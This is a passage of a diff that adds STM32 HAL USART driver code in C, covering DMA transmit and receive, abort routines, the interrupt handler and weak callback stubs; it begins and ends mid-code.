full-duplex receive one */ + HAL_DMA_Start_IT(husart->hdmatx, *(uint32_t *)tmp, (uint32_t)&husart->Instance->DR, Size); + + /* Clear the Overrun flag just before enabling the DMA Rx request: mandatory for the second transfer */ + __HAL_USART_CLEAR_OREFLAG(husart); + + /* Process Unlocked */ + __HAL_UNLOCK(husart); + + /* Enable the USART Parity Error Interrupt */ + SET_BIT(husart->Instance->CR1, USART_CR1_PEIE); + + /* Enable the USART Error Interrupt: (Frame error, noise error, overrun error) */ + SET_BIT(husart->Instance->CR3, USART_CR3_EIE); + + /* Enable the DMA transfer for the receiver request by setting the DMAR bit + in the USART CR3 register */ + SET_BIT(husart->Instance->CR3, USART_CR3_DMAR); + + /* Enable the DMA transfer for transmit request by setting the DMAT bit + in the USART CR3 register */ + SET_BIT(husart->Instance->CR3, USART_CR3_DMAT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Full-Duplex Transmit Receive an amount of data in DMA mode. + * @note When USART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the sent data and the received data are handled as sets of u16. In this case, Size must indicate the number + * of u16 available through pTxData and through pRxData. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @param pTxData Pointer to TX data buffer (u8 or u16 data elements). + * @param pRxData Pointer to RX data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be received/sent. + * @note When the USART parity is enabled (PCE = 1) the data received contain the parity bit. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_USART_TransmitReceive_DMA(USART_HandleTypeDef *husart, uint8_t *pTxData, uint8_t *pRxData, + uint16_t Size) +{ + uint32_t *tmp; + + if (husart->State == HAL_USART_STATE_READY) + { + if ((pTxData == NULL) || (pRxData == NULL) || (Size == 0)) + { + return HAL_ERROR; + } + /* Process Locked */ + __HAL_LOCK(husart); + + husart->pRxBuffPtr = pRxData; + husart->RxXferSize = Size; + husart->pTxBuffPtr = pTxData; + husart->TxXferSize = Size; + + husart->ErrorCode = HAL_USART_ERROR_NONE; + husart->State = HAL_USART_STATE_BUSY_TX_RX; + + /* Set the USART DMA Rx transfer complete callback */ + husart->hdmarx->XferCpltCallback = USART_DMAReceiveCplt; + + /* Set the USART DMA Half transfer complete callback */ + husart->hdmarx->XferHalfCpltCallback = USART_DMARxHalfCplt; + + /* Set the USART DMA Tx transfer complete callback */ + husart->hdmatx->XferCpltCallback = USART_DMATransmitCplt; + + /* Set the USART DMA Half transfer complete callback */ + husart->hdmatx->XferHalfCpltCallback = USART_DMATxHalfCplt; + + /* Set the USART DMA Tx transfer error callback */ + husart->hdmatx->XferErrorCallback = USART_DMAError; + + /* Set the USART DMA Rx transfer error callback */ + husart->hdmarx->XferErrorCallback = USART_DMAError; + + /* Set the DMA abort callback */ + husart->hdmarx->XferAbortCallback = NULL; + + /* Enable the USART receive DMA stream */ + tmp = (uint32_t *)&pRxData; + HAL_DMA_Start_IT(husart->hdmarx, (uint32_t)&husart->Instance->DR, *(uint32_t *)tmp, Size); + + /* Enable the USART transmit DMA stream */ + tmp = (uint32_t *)&pTxData; + HAL_DMA_Start_IT(husart->hdmatx, *(uint32_t *)tmp, (uint32_t)&husart->Instance->DR, Size); + + /* Clear the TC flag in the SR register by writing 0 to it */ + __HAL_USART_CLEAR_FLAG(husart, USART_FLAG_TC); + + /* Clear the Overrun flag: mandatory for the second transfer in circular mode */ + __HAL_USART_CLEAR_OREFLAG(husart); + + /* Process Unlocked */ + __HAL_UNLOCK(husart); + + /* Enable the USART Parity Error Interrupt */ + SET_BIT(husart->Instance->CR1, USART_CR1_PEIE); + + /* Enable the USART Error Interrupt: (Frame error, noise error, overrun error) */ + SET_BIT(husart->Instance->CR3, USART_CR3_EIE); + + /* Enable the DMA transfer for the receiver request by setting the DMAR bit + in the USART CR3 register */ + SET_BIT(husart->Instance->CR3, USART_CR3_DMAR); + + /* Enable the DMA transfer for transmit request by setting the DMAT bit + in the USART CR3 register */ + SET_BIT(husart->Instance->CR3, USART_CR3_DMAT); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Pauses the DMA Transfer. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_USART_DMAPause(USART_HandleTypeDef *husart) +{ + /* Process Locked */ + __HAL_LOCK(husart); + + /* Disable the USART DMA Tx request */ + CLEAR_BIT(husart->Instance->CR3, USART_CR3_DMAT); + + /* Process Unlocked */ + __HAL_UNLOCK(husart); + + return HAL_OK; +} + +/** + * @brief Resumes the DMA Transfer. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_USART_DMAResume(USART_HandleTypeDef *husart) +{ + /* Process Locked */ + __HAL_LOCK(husart); + + /* Enable the USART DMA Tx request */ + SET_BIT(husart->Instance->CR3, USART_CR3_DMAT); + + /* Process Unlocked */ + __HAL_UNLOCK(husart); + + return HAL_OK; +} + +/** + * @brief Stops the DMA Transfer. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_USART_DMAStop(USART_HandleTypeDef *husart) +{ + uint32_t dmarequest = 0x00U; + /* The Lock is not implemented on this API to allow the user application + to call the HAL USART API under callbacks HAL_USART_TxCpltCallback() / HAL_USART_RxCpltCallback(): + when calling HAL_DMA_Abort() API the DMA TX/RX Transfer complete interrupt is generated + and the correspond call back is executed HAL_USART_TxCpltCallback() / HAL_USART_RxCpltCallback() + */ + + /* Stop USART DMA Tx request if ongoing */ + dmarequest = HAL_IS_BIT_SET(husart->Instance->CR3, USART_CR3_DMAT); + if ((husart->State == HAL_USART_STATE_BUSY_TX) && dmarequest) + { + USART_EndTxTransfer(husart); + + /* Abort the USART DMA Tx channel */ + if (husart->hdmatx != NULL) + { + HAL_DMA_Abort(husart->hdmatx); + } + + /* Disable the USART Tx DMA request */ + CLEAR_BIT(husart->Instance->CR3, USART_CR3_DMAT); + } + + /* Stop USART DMA Rx request if ongoing */ + dmarequest = HAL_IS_BIT_SET(husart->Instance->CR3, USART_CR3_DMAR); + if ((husart->State == HAL_USART_STATE_BUSY_RX) && dmarequest) + { + USART_EndRxTransfer(husart); + + /* Abort the USART DMA Rx channel */ + if (husart->hdmarx != NULL) + { + HAL_DMA_Abort(husart->hdmarx); + } + + /* Disable the USART Rx DMA request */ + CLEAR_BIT(husart->Instance->CR3, USART_CR3_DMAR); + } + + return HAL_OK; +} + +/** + * @brief Abort ongoing transfer (blocking mode). + * @param husart USART handle. + * @note This procedure could be used for aborting any ongoing transfer (either Tx or Rx, + * as described by TransferType parameter) started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable PPP Interrupts (depending of transfer direction) + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort (in case of transfer in DMA mode) + * - Set handle State to READY + * @note This procedure is executed in blocking mode : when exiting function, Abort is considered as completed. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_USART_Abort(USART_HandleTypeDef *husart) +{ + /* Disable TXEIE, TCIE, RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(husart->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE | USART_CR1_TXEIE | USART_CR1_TCIE)); + CLEAR_BIT(husart->Instance->CR3, USART_CR3_EIE); + + /* Disable the USART DMA Tx request if enabled */ + if (HAL_IS_BIT_SET(husart->Instance->CR3, USART_CR3_DMAT)) + { + CLEAR_BIT(husart->Instance->CR3, USART_CR3_DMAT); + + /* Abort the USART DMA Tx channel : use blocking DMA Abort API (no callback) */ + if (husart->hdmatx != NULL) + { + /* Set the USART DMA Abort callback to Null. + No call back execution at end of DMA abort procedure */ + husart->hdmatx->XferAbortCallback = NULL; + + HAL_DMA_Abort(husart->hdmatx); + } + } + + /* Disable the USART DMA Rx request if enabled */ + if (HAL_IS_BIT_SET(husart->Instance->CR3, USART_CR3_DMAR)) + { + CLEAR_BIT(husart->Instance->CR3, USART_CR3_DMAR); + + /* Abort the USART DMA Rx channel : use blocking DMA Abort API (no callback) */ + if (husart->hdmarx != NULL) + { + /* Set the USART DMA Abort callback to Null. + No call back execution at end of DMA abort procedure */ + husart->hdmarx->XferAbortCallback = NULL; + + HAL_DMA_Abort(husart->hdmarx); + } + } + + /* Reset Tx and Rx transfer counters */ + husart->TxXferCount = 0x00U; + husart->RxXferCount = 0x00U; + + /* Restore husart->State to Ready */ + husart->State = HAL_USART_STATE_READY; + + /* Reset Handle ErrorCode to No Error */ + husart->ErrorCode = HAL_USART_ERROR_NONE; + + return HAL_OK; +} + +/** + * @brief Abort ongoing transfer (Interrupt mode). + * @param husart USART handle. + * @note This procedure could be used for aborting any ongoing transfer (either Tx or Rx, + * as described by TransferType parameter) started in Interrupt or DMA mode. + * This procedure performs following operations : + * - Disable PPP Interrupts (depending of transfer direction) + * - Disable the DMA transfer in the peripheral register (if enabled) + * - Abort DMA transfer by calling HAL_DMA_Abort_IT (in case of transfer in DMA mode) + * - Set handle State to READY + * - At abort completion, call user abort complete callback + * @note This procedure is executed in Interrupt mode, meaning that abort procedure could be + * considered as completed only when user abort complete callback is executed (not when exiting function). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_USART_Abort_IT(USART_HandleTypeDef *husart) +{ + uint32_t AbortCplt = 0x01U; + + /* Disable TXEIE, TCIE, RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(husart->Instance->CR1, (USART_CR1_RXNEIE | USART_CR1_PEIE | USART_CR1_TXEIE | USART_CR1_TCIE)); + CLEAR_BIT(husart->Instance->CR3, USART_CR3_EIE); + + /* If DMA Tx and/or DMA Rx Handles are associated to USART Handle, DMA Abort complete callbacks should be initialised + before any call to DMA Abort functions */ + /* DMA Tx Handle is valid */ + if (husart->hdmatx != NULL) + { + /* Set DMA Abort Complete callback if USART DMA Tx request if enabled. + Otherwise, set it to NULL */ + if (HAL_IS_BIT_SET(husart->Instance->CR3, USART_CR3_DMAT)) + { + husart->hdmatx->XferAbortCallback = USART_DMATxAbortCallback; + } + else + { + husart->hdmatx->XferAbortCallback = NULL; + } + } + /* DMA Rx Handle is valid */ + if (husart->hdmarx != NULL) + { + /* Set DMA Abort Complete callback if USART DMA Rx request if enabled. + Otherwise, set it to NULL */ + if (HAL_IS_BIT_SET(husart->Instance->CR3, USART_CR3_DMAR)) + { + husart->hdmarx->XferAbortCallback = USART_DMARxAbortCallback; + } + else + { + husart->hdmarx->XferAbortCallback = NULL; + } + } + + /* Disable the USART DMA Tx request if enabled */ + if (HAL_IS_BIT_SET(husart->Instance->CR3, USART_CR3_DMAT)) + { + /* Disable DMA Tx at USART level */ + CLEAR_BIT(husart->Instance->CR3, USART_CR3_DMAT); + + /* Abort the USART DMA Tx channel : use non blocking DMA Abort API (callback) */ + if (husart->hdmatx != NULL) + { + /* USART Tx DMA Abort callback has already been initialised : + will lead to call HAL_USART_AbortCpltCallback() at end of DMA abort procedure */ + + /* Abort DMA TX */ + if (HAL_DMA_Abort_IT(husart->hdmatx) != HAL_OK) + { + husart->hdmatx->XferAbortCallback = NULL; + } + else + { + AbortCplt = 0x00U; + } + } + } + + /* Disable the USART DMA Rx request if enabled */ + if (HAL_IS_BIT_SET(husart->Instance->CR3, USART_CR3_DMAR)) + { + CLEAR_BIT(husart->Instance->CR3, USART_CR3_DMAR); + + /* Abort the USART DMA Rx channel : use non blocking DMA Abort API (callback) */ + if (husart->hdmarx != NULL) + { + /* USART Rx DMA Abort callback has already been initialised : + will lead to call HAL_USART_AbortCpltCallback() at end of DMA abort procedure */ + + /* Abort DMA RX */ + if (HAL_DMA_Abort_IT(husart->hdmarx) != HAL_OK) + { + husart->hdmarx->XferAbortCallback = NULL; + AbortCplt = 0x01U; + } + else + { + AbortCplt = 0x00U; + } + } + } + + /* if no DMA abort complete callback execution is required => call user Abort Complete callback */ + if (AbortCplt == 0x01U) + { + /* Reset Tx and Rx transfer counters */ + husart->TxXferCount = 0x00U; + husart->RxXferCount = 0x00U; + + /* Reset errorCode */ + husart->ErrorCode = HAL_USART_ERROR_NONE; + + /* Restore husart->State to Ready */ + husart->State = HAL_USART_STATE_READY; + + /* As no DMA to be aborted, call directly user Abort complete callback */ +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Abort Complete Callback */ + husart->AbortCpltCallback(husart); +#else + /* Call legacy weak Abort Complete Callback */ + HAL_USART_AbortCpltCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + } + + return HAL_OK; +} + +/** + * @brief This function handles USART interrupt request. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval None + */ +void HAL_USART_IRQHandler(USART_HandleTypeDef *husart) +{ + uint32_t isrflags = READ_REG(husart->Instance->SR); + uint32_t cr1its = READ_REG(husart->Instance->CR1); + uint32_t cr3its = READ_REG(husart->Instance->CR3); + uint32_t errorflags = 0x00U; + uint32_t dmarequest = 0x00U; + + /* If no error occurs */ + errorflags = (isrflags & (uint32_t)(USART_SR_PE | USART_SR_FE | USART_SR_ORE | USART_SR_NE)); + if (errorflags == RESET) + { + /* USART in mode Receiver -------------------------------------------------*/ + if (((isrflags & USART_SR_RXNE) != RESET) && ((cr1its & USART_CR1_RXNEIE) != RESET)) + { + if (husart->State == HAL_USART_STATE_BUSY_RX) + { + USART_Receive_IT(husart); + } + else + { + USART_TransmitReceive_IT(husart); + } + return; + } + } + /* If some errors occur */ + if ((errorflags != RESET) && (((cr3its & USART_CR3_EIE) != RESET) || ((cr1its & (USART_CR1_RXNEIE | USART_CR1_PEIE)) != RESET))) + { + /* USART parity error interrupt occurred ----------------------------------*/ + if (((isrflags & USART_SR_PE) != RESET) && ((cr1its & USART_CR1_PEIE) != RESET)) + { + husart->ErrorCode |= HAL_USART_ERROR_PE; + } + + /* USART noise error interrupt occurred --------------------------------*/ + if (((isrflags & USART_SR_NE) != RESET) && ((cr3its & USART_CR3_EIE) != RESET)) + { + husart->ErrorCode |= HAL_USART_ERROR_NE; + } + + /* USART frame error interrupt occurred --------------------------------*/ + if (((isrflags & USART_SR_FE) != RESET) && ((cr3its & USART_CR3_EIE) != RESET)) + { + husart->ErrorCode |= HAL_USART_ERROR_FE; + } + + /* USART Over-Run interrupt occurred -----------------------------------*/ + if (((isrflags & USART_SR_ORE) != RESET) && (((cr1its & USART_CR1_RXNEIE) != RESET) || ((cr3its & USART_CR3_EIE) != RESET))) + { + husart->ErrorCode |= HAL_USART_ERROR_ORE; + } + + if (husart->ErrorCode != HAL_USART_ERROR_NONE) + { + /* USART in mode Receiver -----------------------------------------------*/ + if (((isrflags & USART_SR_RXNE) != RESET) && ((cr1its & USART_CR1_RXNEIE) != RESET)) + { + if (husart->State == HAL_USART_STATE_BUSY_RX) + { + USART_Receive_IT(husart); + } + else + { + USART_TransmitReceive_IT(husart); + } + } + /* If Overrun error occurs, or if any error occurs in DMA mode reception, + consider error as blocking */ + dmarequest = HAL_IS_BIT_SET(husart->Instance->CR3, USART_CR3_DMAR); + if (((husart->ErrorCode & HAL_USART_ERROR_ORE) != RESET) || dmarequest) + { + /* Set the USART state ready to be able to start again the process, + Disable Rx Interrupts, and disable Rx DMA request, if ongoing */ + USART_EndRxTransfer(husart); + + /* Disable the USART DMA Rx request if enabled */ + if (HAL_IS_BIT_SET(husart->Instance->CR3, USART_CR3_DMAR)) + { + CLEAR_BIT(husart->Instance->CR3, USART_CR3_DMAR); + + /* Abort the USART DMA Rx channel */ + if (husart->hdmarx != NULL) + { + /* Set the USART DMA Abort callback : + will lead to call HAL_USART_ErrorCallback() at end of DMA abort procedure */ + husart->hdmarx->XferAbortCallback = USART_DMAAbortOnError; + + if (HAL_DMA_Abort_IT(husart->hdmarx) != HAL_OK) + { + /* Call Directly XferAbortCallback function in case of error */ + husart->hdmarx->XferAbortCallback(husart->hdmarx); + } + } + else + { + /* Call user error callback */ +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Error Callback */ + husart->ErrorCallback(husart); +#else + /* Call legacy weak Error Callback */ + HAL_USART_ErrorCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + } + } + else + { + /* Call user error callback */ +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Error Callback */ + husart->ErrorCallback(husart); +#else + /* Call legacy weak Error Callback */ + HAL_USART_ErrorCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + } + } + else + { + /* Call user error callback */ +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Error Callback */ + husart->ErrorCallback(husart); +#else + /* Call legacy weak Error Callback */ + HAL_USART_ErrorCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + husart->ErrorCode = HAL_USART_ERROR_NONE; + } + } + return; + } + + /* USART in mode Transmitter -----------------------------------------------*/ + if (((isrflags & USART_SR_TXE) != RESET) && ((cr1its & USART_CR1_TXEIE) != RESET)) + { + if (husart->State == HAL_USART_STATE_BUSY_TX) + { + USART_Transmit_IT(husart); + } + else + { + USART_TransmitReceive_IT(husart); + } + return; + } + + /* USART in mode Transmitter (transmission end) ----------------------------*/ + if (((isrflags & USART_SR_TC) != RESET) && ((cr1its & USART_CR1_TCIE) != RESET)) + { + USART_EndTransmit_IT(husart); + return; + } +} + +/** + * @brief Tx Transfer completed callbacks. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval None + */ +__weak void HAL_USART_TxCpltCallback(USART_HandleTypeDef *husart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(husart); + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_USART_TxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Tx Half Transfer completed callbacks. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval None + */ +__weak void HAL_USART_TxHalfCpltCallback(USART_HandleTypeDef *husart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(husart); + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_USART_TxHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Rx Transfer completed callbacks. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval None + */ +__weak void HAL_USART_RxCpltCallback(USART_HandleTypeDef *husart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(husart); + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_USART_RxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Rx Half Transfer completed callbacks. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval None + */ +__weak void HAL_USART_RxHalfCpltCallback(USART_HandleTypeDef *husart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(husart); + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_USART_RxHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Tx/Rx Transfers completed callback for the non-blocking process. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval None + */ +__weak void HAL_USART_TxRxCpltCallback(USART_HandleTypeDef *husart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(husart); + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_USART_TxRxCpltCallback could be implemented in the user file + */ +} + +/** + * @brief USART error callbacks. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval None + */ +__weak void HAL_USART_ErrorCallback(USART_HandleTypeDef *husart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(husart); + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_USART_ErrorCallback could be implemented in the user file + */ +} + +/** + * @brief USART Abort Complete callback. + * @param husart USART handle. + * @retval None + */ +__weak void HAL_USART_AbortCpltCallback(USART_HandleTypeDef *husart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(husart); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_USART_AbortCpltCallback can be implemented in the user file. + */ +} + +/** + * @} + */ + +/** @defgroup USART_Exported_Functions_Group3 Peripheral State and Errors functions + * @brief USART State and Errors functions + * +@verbatim + ============================================================================== + ##### Peripheral State and Errors functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to return the State of + USART communication + process, return Peripheral Errors occurred during communication process + (+) HAL_USART_GetState() API can be helpful to check in run-time the state + of the USART peripheral. + (+) HAL_USART_GetError() check in run-time errors that could be occurred during + communication. +@endverbatim + * @{ + */ + +/** + * @brief Returns the USART state. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @retval HAL state + */ +HAL_USART_StateTypeDef HAL_USART_GetState(USART_HandleTypeDef *husart) +{ + return husart->State; +} + +/** + * @brief Return the USART error code + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART. + * @retval USART Error Code + */ +uint32_t HAL_USART_GetError(USART_HandleTypeDef *husart) +{ + return husart->ErrorCode; +} + +/** + * @} + */ + +/** @defgroup USART_Private_Functions USART Private Functions + * @{ + */ + +/** + * @brief Initialize the callbacks to their default values. + * @param husart USART handle. + * @retval none + */ +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) +void USART_InitCallbacksToDefault(USART_HandleTypeDef *husart) +{ + /* Init the USART Callback settings */ + husart->TxHalfCpltCallback = HAL_USART_TxHalfCpltCallback; /* Legacy weak TxHalfCpltCallback */ + husart->TxCpltCallback = HAL_USART_TxCpltCallback; /* Legacy weak TxCpltCallback */ + husart->RxHalfCpltCallback = HAL_USART_RxHalfCpltCallback; /* Legacy weak RxHalfCpltCallback */ + husart->RxCpltCallback = HAL_USART_RxCpltCallback; /* Legacy weak RxCpltCallback */ + husart->TxRxCpltCallback = HAL_USART_TxRxCpltCallback; /* Legacy weak TxRxCpltCallback */ + husart->ErrorCallback = HAL_USART_ErrorCallback; /* Legacy weak ErrorCallback */ + husart->AbortCpltCallback = HAL_USART_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ +} +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + +/** + * @brief DMA USART transmit process complete callback. + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void USART_DMATransmitCplt(DMA_HandleTypeDef *hdma) +{ + USART_HandleTypeDef *husart = (USART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + /* DMA Normal mode */ + if ((hdma->Instance->CR & DMA_SxCR_CIRC) == 0U) + { + husart->TxXferCount = 0U; + if (husart->State == HAL_USART_STATE_BUSY_TX) + { + /* Disable the DMA transfer for transmit request by resetting the DMAT bit + in the USART CR3 register */ + CLEAR_BIT(husart->Instance->CR3, USART_CR3_DMAT); + + /* Enable the USART Transmit Complete Interrupt */ + SET_BIT(husart->Instance->CR1, USART_CR1_TCIE); + } + } + /* DMA Circular mode */ + else + { + if (husart->State == HAL_USART_STATE_BUSY_TX) + { +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Tx Complete Callback */ + husart->TxCpltCallback(husart); +#else + /* Call legacy weak Tx Complete Callback */ + HAL_USART_TxCpltCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + } + } +} + +/** + * @brief DMA USART transmit process half complete callback + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void USART_DMATxHalfCplt(DMA_HandleTypeDef *hdma) +{ + USART_HandleTypeDef *husart = (USART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Tx Half Complete Callback */ + husart->TxHalfCpltCallback(husart); +#else + /* Call legacy weak Tx Half Complete Callback */ + HAL_USART_TxHalfCpltCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA USART receive process complete callback. + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void USART_DMAReceiveCplt(DMA_HandleTypeDef *hdma) +{ + USART_HandleTypeDef *husart = (USART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + /* DMA Normal mode */ + if ((hdma->Instance->CR & DMA_SxCR_CIRC) == 0U) + { + husart->RxXferCount = 0x00U; + + /* Disable RXNE, PE and ERR (Frame error, noise error, overrun error) interrupts */ + CLEAR_BIT(husart->Instance->CR1, USART_CR1_PEIE); + CLEAR_BIT(husart->Instance->CR3, USART_CR3_EIE); + + /* Disable the DMA transfer for the Transmit/receiver request by clearing the DMAT/DMAR bit + in the USART CR3 register */ + CLEAR_BIT(husart->Instance->CR3, USART_CR3_DMAR); + CLEAR_BIT(husart->Instance->CR3, USART_CR3_DMAT); + + /* The USART state is HAL_USART_STATE_BUSY_RX */ + if (husart->State == HAL_USART_STATE_BUSY_RX) + { +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Rx Complete Callback */ + husart->RxCpltCallback(husart); +#else + /* Call legacy weak Rx Complete Callback */ + HAL_USART_RxCpltCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + } + /* The USART state is HAL_USART_STATE_BUSY_TX_RX */ + else + { +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Tx Rx Complete Callback */ + husart->TxRxCpltCallback(husart); +#else + /* Call legacy weak Tx Rx Complete Callback */ + HAL_USART_TxRxCpltCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + } + husart->State = HAL_USART_STATE_READY; + } + /* DMA circular mode */ + else + { + if (husart->State == HAL_USART_STATE_BUSY_RX) + { +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Rx Complete Callback */ + husart->RxCpltCallback(husart); +#else + /* Call legacy weak Rx Complete Callback */ + HAL_USART_RxCpltCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + } + /* The USART state is HAL_USART_STATE_BUSY_TX_RX */ + else + { +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Tx Rx Complete Callback */ + husart->TxRxCpltCallback(husart); +#else + /* Call legacy weak Tx Rx Complete Callback */ + HAL_USART_TxRxCpltCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ + } + } +} + +/** + * @brief DMA USART receive process half complete callback + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void USART_DMARxHalfCplt(DMA_HandleTypeDef *hdma) +{ + USART_HandleTypeDef *husart = (USART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Rx Half Complete Callback */ + husart->RxHalfCpltCallback(husart); +#else + /* Call legacy weak Rx Half Complete Callback */ + HAL_USART_RxHalfCpltCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA USART communication error callback. + * @param hdma Pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void USART_DMAError(DMA_HandleTypeDef *hdma) +{ + uint32_t dmarequest = 0x00U; + USART_HandleTypeDef *husart = (USART_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + husart->RxXferCount = 0x00U; + husart->TxXferCount = 0x00U; + + /* Stop USART DMA Tx request if ongoing */ + dmarequest = HAL_IS_BIT_SET(husart->Instance->CR3, USART_CR3_DMAT); + if ((husart->State == HAL_USART_STATE_BUSY_TX) && dmarequest) + { + USART_EndTxTransfer(husart); + } + + /* Stop USART DMA Rx request if ongoing */ + dmarequest = HAL_IS_BIT_SET(husart->Instance->CR3, USART_CR3_DMAR); + if ((husart->State == HAL_USART_STATE_BUSY_RX) && dmarequest) + { + USART_EndRxTransfer(husart); + } + + husart->ErrorCode |= HAL_USART_ERROR_DMA; + husart->State = HAL_USART_STATE_READY; + +#if (USE_HAL_USART_REGISTER_CALLBACKS == 1) + /* Call registered Error Callback */ + husart->ErrorCallback(husart); +#else + /* Call legacy weak Error Callback */ + HAL_USART_ErrorCallback(husart); +#endif /* USE_HAL_USART_REGISTER_CALLBACKS */ +} + +/** + * @brief This function handles USART Communication Timeout. + * @param husart Pointer to a USART_HandleTypeDef structure that contains + * the configuration information for the specified USART module. + * @param Flag specifies the USART flag to check. + * @param Status The new Flag status (SET or RESET). + * @param Tickstart Tick start value. + * @param Timeout Timeout duration. + * @retval HAL status + */ +static HAL_StatusTypeDef USART_WaitOnFlagUntilTimeout(USART_HandleTypeDef *husart, uint32_t Flag, FlagStatus Status, + uint32_t Tickstart, uint32_t Timeout) +{ + /* Wait until flag is set */ + while ((__HAL_USART_GET_FLAG(husart, Flag) ? SET : RESET) == Status) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if ((Timeout == 0U) || ((HAL_GetTick() - Tickstart) > Timeout)) + { + /* Disable the USART Transmit Complete Interrupt */ + CLEAR_BIT(husart->Instance->CR1, USART_CR1_TXEIE); + + /* Disable the USART RXNE Interrupt */ + CLEAR_BIT(husart->Instance->CR1, USART_CR1_RXNEIE); + + /* Disable the USART Parity Error Interrupt */ + CLEAR_BIT(husart->Instance->CR1, USART_CR1_PEIE); + + /* Disable the USART Error Interrupt: (Frame error, noise error, overrun error) */ + 